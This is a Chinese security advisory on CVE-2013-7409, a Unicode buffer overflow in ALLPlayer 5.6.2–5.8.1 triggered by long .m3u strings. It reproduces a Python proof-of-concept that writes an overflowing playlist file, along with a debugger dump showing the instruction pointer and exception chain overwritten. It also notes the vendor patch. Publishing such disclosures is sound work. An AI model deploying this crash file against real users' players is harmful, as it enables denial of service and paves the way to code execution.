ALLPlayer 5.6.2版本本地缓冲区溢出漏洞

ALLPlayer 5.6.2版本本地缓冲区溢出漏洞

发布日期：2014-10-30
更新日期：2014-11-04

受影响系统：
ALLPlayer ALLPlayer 5.6.2－5.8.1
描述：
CVE(CAN) ID: CVE-2013-7409

 ALLPlayer是媒体播放软件。

ALLPlayer 5.6.2－5.8.1版本在实现上存在缓冲区溢出漏洞，远程攻击者通过.m3u文件内的较长字符串，利用此漏洞可造成拒绝服务和执行任意代码。

<*来源：metacom
  *>

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
metacom （）提供了如下测试方法：

Title: ALLPlayer Local Buffer Overflow PoC UNICODE
 Vendor: http://www.allplayer.org/download/allplayer
 Date found:    09.10.2013
 Date published: 09.10.2013
 Platform: windows 7 German
 Bug: Buffer Overflow UNICODE
 ----------------------------
 
 1)VERSIONS AFFECTED
 ----
 ALLPlayer 5.6.2

 2)Proof of Concept
 ------------------
 
 junk = "http://"

 buffer="\x41" * 5000

 exploit = junk + buffer

 try:
    out_file = open("ALLPlayer_Poc.m3u",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!"
 except:
    print "Error"

 3)-(DEBUG)
 ----------
 (1e60.1dec): Access violation - code c0000005 (!!! second chance !!!)
 *** WARNING: Unable to verify checksum for C:\Program Files\ALLPlayer\ALLPlayer.exe
 *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\ALLPlayer\ALLPlayer.exe
 eax=00000000 ebx=00000000 ecx=00410041 edx=770d720d esi=00000000 edi=00000000
 eip=00410041 esp=000311c4 ebp=000311e4 iopl=0        nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            efl=00210246
 ALLPlayer+0x10041:
 00410041 008bc0ff2504    add    byte ptr [ebx+425FFC0h],cl ds:0023:0425ffc0=??
 0:000> !exchain
 ---------------
 0012e4b0: ALLPlayer+1b7037 (005b7037)
 0012e734: ALLPlayer+10041 (00410041)
 Invalid exception stack at 00410041

 4)Credits
 ---------
 metacom
 Contact : metacom27 at gmail.com

建议：
厂商补丁：

ALLPlayer
 ---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.allplayer.org/

本文永久更新链接地址：